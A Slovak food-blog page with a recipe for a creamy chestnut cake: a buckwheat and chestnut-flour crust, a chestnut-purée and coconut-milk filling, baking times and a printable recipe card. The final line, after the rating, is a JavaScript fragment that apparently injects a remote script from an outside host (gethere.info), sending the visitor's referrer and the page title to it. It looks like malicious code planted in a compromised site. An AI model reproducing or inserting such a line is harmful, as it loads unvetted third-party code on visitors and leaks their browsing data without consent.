FoodLover

prinášame pôžitok zo zdravého jedla

  • Blog
    • Recepty
      • Homemade
      • Raňajky
      • Šaláty
      • Polievky
      • Hlavné jedlá
      • Sladké potešenia
      • Slané pochúťky
    • Články
      • Zo života
      • Zdravá výzva
        • Jedálniček
        • Blog
        • Pravidlá pre rok 2016
        • O Whole30
  • Čo robím
    • Kurzy varenia
    • Catering
    • Produkty mandlove
  • O mne
    • Kto som
    • Príbeh
  • Kontakt
You are here: Home / Blog / Recepty / Krémová gaštanová torta

Krémová gaštanová torta

13/11/2015 by Martina Leave a Comment

Určite mi dáte za pravdu, že táto jeseň je naozaj neuveriteľne krásna :)… Počasie je ako z jesennej rozprávky – slniečko, nádherné farby všade kam sa pozriete a viac-menej je stále teplučko.

Ďalší gaštanový recept, ktorý sme si pre Vás pripravili je táto fantastická krémová torta. Podarilo sa nám vymyslieť úžasne krehké cesto z pohánkovej a gaštanovej múky a dnes sa s Vami o tento recept podelíme. Viem, že pohánkovú múku nezvykneme v našich receptoch veľmi používať, no už aj ja som uznala, že trochu zdravých polysacharidov v mojej strave mi nezaškodí :). Textúrou je táto torta podobná cheesecake-om a teda Vám viem zaručiť, že si na nej naozaj pochutíte. Nehovoriac o tom, že kombinácia gaštanov, citrónovej kôry a vanilky je jednoducho neodolateľná!

IMG_0977

Ingrediencie: (na formu s priemerom 18cm*)

cesto:

  • 100g pohánkovej múky
  • 50g gaštanovej múky
  • 50g zmäknutého masla / kokosového oleja
  • 1 lyžica medu (asi 20g)
  • asi 2 lyžice vody / kokosového mlieka – pridávame počas spracovania cesta
  • štipka soli

krém:

  • 250g gaštanového pyré (my kupujeme v Kauflande – majú ho tam v BIO kvalite s 82% podielom gaštanov)
  • 150ml kokosového mlieka (aspoň so 60% podielom kokosu – asi 18% tuku)
  • 2 vajíčka
  • kôra z 1/2 citróna
  • semiačka z 1/2 vanilkového lusku a štipka škorice

na dokončenie:

  • kakao, kakaové bôby, čokoládové hoblinky

IMG_0959

Postup:

  1. Všetky ingrediencie na cesto spracujeme rukou, alebo v robote na tuhé cesto pripomínajúce to linecké.
  2. Cestom vystelieme dno a kraje tortovej formy.
  3. Všetky ingrediencie na krém spolu vyšľaháme, nalejeme do formy a pečieme 10 minút pri 180°C a potom 20-30 minút pri 150°C – pri príprave je veľmi podobný postup ako pri cheesecake-och :) – takisto by sa mal stred torty ešte trošičku triasť, keď ho vyberáte z rúry.
  4. Tortu necháme vychladnúť a dozdobíme podľa fantázie.
  5. Môžeme podávať :). Dobrú chuť.

* ak použijete väčšiu formu, skráťte čas pečenia, alebo zväčšite množstvá ingrediencií

IMG_0974

Print
Krémová gaštanová torta

Krémová gaštanová torta

Ingredients

    cesto:
  • 100g pohánkovej múky
  • 50g gaštanovej múky
  • 50g zmäknutého masla / kokosového oleja
  • 1 lyžica medu (asi 20g)
  • asi 2 lyžice vody / kokosového mlieka – pridávame počas spracovania cesta
  • štipka soli
    krém:
  • 250g gaštanového pyré (my kupujeme v Kauflande – majú ho tam v BIO kvalite s 82% podielom gaštanov)
  • 150ml kokosového mlieka (aspoň so 60% podielom kokosu – asi 18% tuku)
  • 2 vajíčka
  • kôra z 1/2 citróna
  • semiačka z 1/2 vanilkového lusku a štipka škorice
    na dokončenie:
  • kakao, kakaové bôby, čokoládové hoblinky

Instructions

  1. Všetky ingrediencie na cesto spracujeme rukou, alebo v robote na tuhé cesto pripomínajúce to linecké.
  2. Cestom vystelieme dno a kraje tortovej formy.
  3. Všetky ingrediencie na krém spolu vyšľaháme, nalejeme do formy a pečieme 10 minút pri 180°C a potom 20-30 minút pri 150°C – pri príprave je veľmi podobný postup ako pri cheesecake-och :) – takisto by sa mal stred torty ešte trošičku triasť, keď ho vyberáte z rúry.
  4. Tortu necháme vychladnúť a dozdobíme podľa fantázie.
  5. Môžeme podávať :). Dobrú chuť.

Notes

na formu s priemerom 18cm* * ak použijete väčšiu formu, skráťte čas pečenia, alebo zväčšite množstvá ingrediencií

5.0
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;